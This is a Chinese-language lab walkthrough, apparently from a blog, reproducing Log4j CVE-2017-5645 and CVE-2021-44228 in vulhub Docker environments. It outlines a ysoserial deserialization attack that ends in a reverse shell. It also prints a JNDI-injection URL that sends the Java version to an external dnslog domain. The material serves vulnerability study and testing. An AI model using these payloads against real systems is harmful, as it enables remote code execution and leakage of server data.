Apache log4j漏洞总结
目录
log4j简介
工具链接
漏洞复现
CVE-2017-5645(Log4j反序列化漏洞)
环境搭建
漏洞原理
影响版本
漏洞复现
CVE-2021-44228(Log4j 2远程代码执行漏洞)
环境搭建
漏洞原理
影响版本
漏洞复现
log4j简介
Apache Log4j 是一个用于Java的日志记录库,其支持启动远程日志服务器。
工具链接
- vulhub 官网链接: https://vulhub.org
- shell生成 网站链接: https://forum.ywhack.com/shell.php
- ysoserial 工具链接: https://github.com/frohoff/ysoserial/releases
漏洞复现
CVE-2017-5645(Log4j反序列化漏洞)
环境搭建
- 攻击机IP 121.36.20.179
- 服务器IP 171.20.10.5
漏洞原理
Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞,攻击者可利用该漏洞执行任意代码。
影响版本
Log4j < 2.8.2
漏洞复现
1.切换到CVE-07-5645目录下,然后运行`docker-compose up -d`,命令,然后运行`docker-compose ps`命令可以看到4712端口打开,环境搭建成功 。
2.利用在线网站生成经过base64加密过的shell命令
3.然后利用ysoserial工具,将流量发送给服务器4712端口。
4.侦听我们攻击机的4445端口,等待反弹shell,可以看到成功反弹shell
CVE-2021-44228(Log4j 2远程代码执行漏洞)
环境搭建
- 服务器IP 121.36.20.179
漏洞原理
在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志的情况下,通过传入类似${jndi:ldap://xxx.dns.com/com mond}的lookup用于进行JNDI注入,执行任意代码。
影响版本
- 2.0<=log4j 2<=2.14.1
漏洞复现
1.切换到CVE-2021-44228目录,然后运行`docker-compose up -d`,命令,然后访问服务器8983端口,可以看到环境搭建成功
2.然后访问指定路径`http://121.36.20.179:8983/solr/admin/cores?action=${jndi:ldap://${sys :java.version}.ekbkqh.dnsl og.cn}`注:标红地方为dnslog当中生成的子域名,当域名有解析记录时,则存在此漏洞。
Apache log4j漏洞总结相关推荐
- 网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御
起底Apache Log4j漏洞: 如何出现.如何被利用与如何防御 受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务 受影响用户: 任何使用Log4j的具备该漏洞版本的组织 影响: 远程攻击 ...
- apache log4j漏洞复现
文章目录 1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) 利用条件 利用 2. CVE-2019-17571 利用条件 利用 3. apache lo ...
- Apache Log4j 漏洞持续爆雷,还能安心玩论坛吗?
这一周,各家互联网公司的程序员朋友们,都快被一个叫 Apache Log4j的史诗级漏洞给搞疯了! 这个漏洞源于一个叫 Log4J2 的 Java 开源日志框架,它在用 Java 敲代码的码农群体里可 ...
- Apache Log4j 漏洞(JNDI注入 CVE-2021-44228)
漏洞 影响范围 2.0 <= Apache log4j <= 2.14.1 利用 import org.apache.log4j.Logger;import java.io.*; impo ...
- Apache Log4j漏洞学习笔记
JNDI注入 LDAP 轻量级目录访问协议 可以理解为是一种目录数据库,概念上类似于马云的中国黄页.城镇电话簿这种. 比较典型的应用场景:统一登录 例如: 一个公司下有很多系统比如OA.VPN ...
- 「屋漏偏逢连夜雨」,Log4j 漏洞还没忙完,新的又来了
整理 | 郑丽媛.禾木木 出品 | CSDN 这几天,Apache Log4j 2 绝对是众多 Java 程序员提到的高频词之一:由于 Apache Log4j 2 引发的严重安全漏洞,令一大批安全人 ...
- 如何看待 Apache Log4j 2 远程代码执行漏洞?
Apache Log4j2 是一款优秀的 Java 日志框架,大量的业务框架都使用了该组件. 2021 年 11 月 24 日,阿里云安全团队向 Apache 官方报告了 Apache Log4j2 ...
- Apache Log4j任意代码执行漏洞安全风险通告第三次更新
奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 风险通告 近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞.经过分析,该组件存在Java JNDI注入 ...
- Apache Log4j 远程代码注入漏洞
漏洞说明 2021年12月9日,Apache Log4j2 Java 日志模块存在远程命令执行漏洞可直接控制目标服务器问题,攻击者攻击难度极低.由于 Apache Log4j2 某些功能存在递归解析功 ...
最新文章
- 助力5G行业应用扬帆启航,第二届5G毫米波产业高峰论坛圆满召开
- mysql unix 安装教程_在UNIX系统下安装MySQL_MySQL
- 打开流 fopen 、freopen和fdopen函数
- 互联网职场就像一场《鱿鱼游戏》
- JWT实现token-based会话管理
- 详解:从Greenplum、Hadoop到现在的阿里大数据技术
- iOS UITableView 移除单元格选中时的高亮状态
- synchronized简介
- C++_类和对象_C++继承_同名静态成员处理_父类子类中存在同名静态成员变量_同名静态成员函数时的处理方法---C++语言工作笔记066
- netfilter和iptables的实现机制
- Java通过JNI调用C++的DLL库
- 拓端tecdat|R语言使用限制平均生存时间RMST比较两条生存曲线分析肝硬化患者
- POJ 3756 多边形内角和
- js获取ip地址、浏览器信息
- 服务器搬迁方案_网站服务器迁移方案
- 解决使用Keil5不能生成bin文件或生成的是.bin文件夹问题
- 简易图解N合1集成安装光盘制作教程
- 周志华 《机器学习》之 第十二章(计算学习理论)概念总结
- 算法与数据结构(邓俊辉)第一章
- Android开发之黑科技安装APP无启动图标